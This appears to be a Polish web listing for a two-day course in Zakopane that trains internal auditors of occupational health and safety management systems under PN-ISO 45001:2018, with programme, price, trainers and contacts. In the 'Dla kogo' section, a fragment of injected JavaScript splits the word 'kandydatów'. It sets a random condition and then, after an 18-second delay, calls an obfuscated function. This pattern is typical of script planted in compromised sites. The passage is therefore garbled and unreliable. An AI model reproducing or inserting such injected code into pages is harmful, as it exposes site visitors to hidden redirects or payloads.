Szkolenie – Auditor Systemu Zarządzania BHP wg norm PN-ISO 45001:2018


Kod i temat szkolenia:

SZB 02 – Auditor Systemu Zarządzania BHP wg norm PN-ISO 45001:2018


Cel szkolenia:

Celem szkolenia jest nabycie uprawnień do prowadzenia auditów wewnętrznych systemu zarządzania bezpieczeństwem i higieną pracy.


Dla kogo:

Szkolenie polecane jest dla kandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andydatów na auditorów wewnętrznych systemu zarządzania BHP.


Program szkolenia:

Szkolenie odbędzie się w formie krótkich wykładów, moderowanych quizów, ćwiczeń na dokumentacji auditowej.
Program szkolenia:

Przyjazd o 12.00, rozpoczęcie zajęć o 14.00

 1. Wstęp
 2. Podstawowe definicje systemu zarządzania BHP
 3. Omówienie wymagań normy PN-ISO 45001:2018 z punktu widzenia auditora
 4. Projekt normy ISO 45001
 5. Omówienie podstawowych wymagań prawnych z zakresu BHP i PPOŻ
 6. Omówienie wytycznych do auditowania wg normy ISO 19011:2011
 7. Symulacja auditu – ćwiczenia
  • sporządzenie planu auditu
  • przygotowanie się do auditu, w tym sporządzenie listy pytań / listy kontrolnej
  • spotkanie otwierające
  • badanie auditowe – rozmowy z auditowanymi, notowanie uwag, spostrzeżeń i niezgodności
  • spotkanie zamykające
  • zapisywanie niezgodności
  • sporządzenie raportu z auditu

Egzamin – osoby, które zdadzą egzamin otrzymają certyfikat brytyjskiej jednostki certyfikującej DAS Certification Ltd


Terminy i miejsca szkolenia:

27.02 – 01.03.2019 – Zakopane


Adresy:

Ośrodek Konferencyjno-Wypoczynkowy „HYRNY” ul.Piłsudskiego 20, 34-500 Zakopane


Cena:

1550zł netto (Cena promocyjna 1450* zł netto)

* W przypadku zgłoszenia co najmniej 2 osób z tej samej organizacji, stali Klienci Biura „SYSTEM” oraz członkowie Forum ISO 9000, 14000 oraz 45000.


Cena obejmuje:

 • udział w szkoleniu
 • materiały szkoleniowe
 • przerwy kawowe
 • wyżywienie
 • noclegi w pokojach 2-osobowych
 • zaświadczenie ukończenia szkolenia

Trenerzy:

Andrzej Kowalkow – Wykładowca w dziedzinie zarządzania bezpieczeństwem i higieną pracy ( min.): PCBC, WSZOP, CIOP UDT. Członek Komitetu Technicznego nr 276 ds. Systemów Zarządzania Bezpieczeństwem i Higieną Pracy, przy Polskim Komitecie Normalizacyjnym w Warszawie. Członek Komitetu Technicznego Ośrodka Certyfikacji Kompetencji Personelu i Systemów Zarządzania przy Centralnym Instytucie Ochrony Pracy Państwowym Instytucie Badawczym w Warszawie. Auditor wiodący Bureau Veritas Certification Polska.

i / lub

Dariusz Okraska – specjalista ds. zarządzania bezpieczeństwem i higieną, auditor wewnętrzny ZSZ, auditor angielskiej jednostki certyfikującej DAS Certification Ltd. i DAS Polska w zakresie systemu zarządzania jakością wg ISO 9001:2008 oraz systemu zarządzania bezpieczeństwem i higieną pracy wg PN-N-18001:2004 i OHSAS 18001:2007. Współautor publikacji Verlag Dashoffer Seria norm ISO 9000. Nowoczesne zarządzanie firmą. Poradnik dla przedsiębiorstw w zakresie norm serii ISO 9001, ISO 14000 i PN-N-18000


Kontakt:

Dariusz Okraska tel. 34-321-43-80, 504-255-339, d.okraska@biuro-system.com

Andrzej Kowalkow tel. 34-321-43-80, 504-255-340, a.kowalkow@biuro-system.com


Więcej na www.biuro-system.com